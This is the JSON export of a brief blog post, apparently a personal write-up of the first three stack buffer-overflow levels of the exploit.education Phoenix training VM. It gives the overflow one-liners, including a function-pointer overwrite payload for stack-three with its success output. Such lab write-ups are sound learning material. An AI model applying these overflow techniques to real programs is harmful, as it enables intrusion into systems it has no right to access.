{"id":298,"date":"2020-01-11T22:07:18","date_gmt":"2020-01-11T22:07:18","guid":{"rendered":"http:\/\/www.unordnung.net\/?p=298"},"modified":"2020-01-11T22:07:18","modified_gmt":"2020-01-11T22:07:18","slug":"writeup-phoenix-exploit-education","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/01\/writeup-phoenix-exploit-education\/","title":{"rendered":"WriteUp: Phoenix Exploit.Education"},"content":{"rendered":"\n

Writeup for the Phoenix VM from http:\/\/exploit.education\/phoenix\/<\/a>.<\/p>\n\n\n

stack-one<\/strong>
python -c 'print 64*\"A\"'<\/code><\/p>\n\n\n

stack-two<\/strong>
export ExploitEducation=$\"cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\\n\\t\\n\\r\"<\/code>

learned about endianess here. really missing some of the basic computer science stuff, but well coming to it…
<\/p>\n\n\n

stack-three<\/strong>
user@phoenix-amd64:\/opt\/phoenix\/amd64$ objdump stack-three -x | grep level<\/code>
<\/p>\n\n\n

user@phoenix-amd64:\/opt\/phoenix\/amd64$ python -c 'print \"c\"*64+\"\\x9d\\x06@\"' | .\/stack-three <\/code>
Welcome to phoenix\/stack-three, brought to you by https:\/\/exploit.education
calling function pointer @ 0x40069d
Congratulations, you’ve finished phoenix\/stack-three \ud83d\ude42 Well done!

After researching for escaping ascii chars forever it seemed to me… but the \\xHEXCODE notation ist pretty good to remember http:\/\/defindit.com\/ascii.html<\/a><\/p>\n\n\n

tbc<\/p>\n","protected":false},"excerpt":{"rendered":"

Writeup for the Phoenix VM from http:\/\/exploit.education\/phoenix\/. stack-onepython -c ‘print 64*”A”‘ stack-twoexport ExploitEducation=$”cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\\n\\t\\n\\r” learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:\/opt\/phoenix\/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:\/opt\/phoenix\/amd64$ python -c ‘print “c”*64+”\\x9d\\x06@”‘ | .\/stack-three Welcome to phoenix\/stack-three, brought to you by https:\/\/exploit.education calling function … Read moreWriteUp: Phoenix Exploit.Education<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[21,29,37,46,80],"class_list":["post-298","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-writeup","category-to_remember","tag-exploiting","tag-hacking","tag-infosec","tag-linux","tag-writeup"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/298","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=298"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/298\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}